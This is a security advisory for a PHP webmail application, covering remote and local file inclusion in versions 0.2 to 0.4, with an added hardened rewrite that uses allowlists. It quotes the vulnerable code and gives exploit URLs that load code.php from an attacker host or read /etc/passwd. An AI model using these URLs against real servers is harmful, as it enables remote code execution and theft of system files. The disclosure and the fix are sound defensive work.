Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems : Include file (local, remote)
Version: 0.2;0.3
File:
email.php3 (version 0.2) ; email.php (version 0.3)
PHP Code:
[…]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[…]
Exploit :
Remote file include:
http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
--> includes http://[attacker]/code.php on the remote server
Local file include:
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
Versions: 0.4
File:
webmail/lib/emailreader_execute_on_each_page.inc.php
PHP Code:
[…]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[…]
Exploit :
Remote file include:
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
--> includes http://[attacker]/code.php on the remote server
Local file include:
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd
(if register_globals=ON)
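A hardened counterpart to the 0.4 include logic quoted above, as an added example (not code from this advisory or from the project it describes): request data is decoded into a local array with the two-argument form of parse_str, and every include path is built from a fixed directory plus an allowlisted name. The allowlist values, the function names and the use of base64_decode in place of imap_base64 are assumptions; the same allowlist approach applies to $cer_skin in 0.2/0.3.

```php
<?php
// Added example: allowlist values and function names are assumptions.

const ALLOWED_SERVERS = ['imap', 'pop3'];   // hypothetical server types
const ALLOWED_LANGS   = ['en', 'fr'];       // hypothetical skin languages

/** Return $value only if it is a string on the allowlist, else $default. */
function pick(array $allowed, $value, string $default): string
{
    return (is_string($value) && in_array($value, $allowed, true)) ? $value : $default;
}

/** Decode the login blob into a local array instead of into variables. */
function decode_params(string $login): array
{
    // Assumption: plain base64 stands in for the page's imap_base64().
    $raw = base64_decode($login, true);
    if ($raw === false) {
        return [];
    }
    $params = [];
    parse_str($raw, $params);   // two-argument form: nothing lands in scope
    return $params;
}

/** Build include paths from fixed directories and allowlisted names only. */
function resolve_includes(array $params): array
{
    $server = pick(ALLOWED_SERVERS, $params['server_type'] ?? null, 'imap');
    $lang   = pick(ALLOWED_LANGS, $params['lang'] ?? null, 'en');
    return [
        __DIR__ . '/emailreader.ini',                        // constant, never from input
        __DIR__ . '/lib/' . $server . '.inc.php',
        __DIR__ . '/skin/emailreaderskin_' . $lang . '.php',
    ];
}

// Constructed sample input carrying a parameter from the advisory.
$login = base64_encode('server_type=imap&lang=fr&emailreader_ini=/etc/passwd');
foreach (resolve_includes(decode_params($login)) as $path) {
    echo $path, PHP_EOL;   // a real page would require() these paths
}
```

The emailreader_ini value in the sample is ignored because no include path is read from the decoded parameters; only the allowlisted server type and language influence the result.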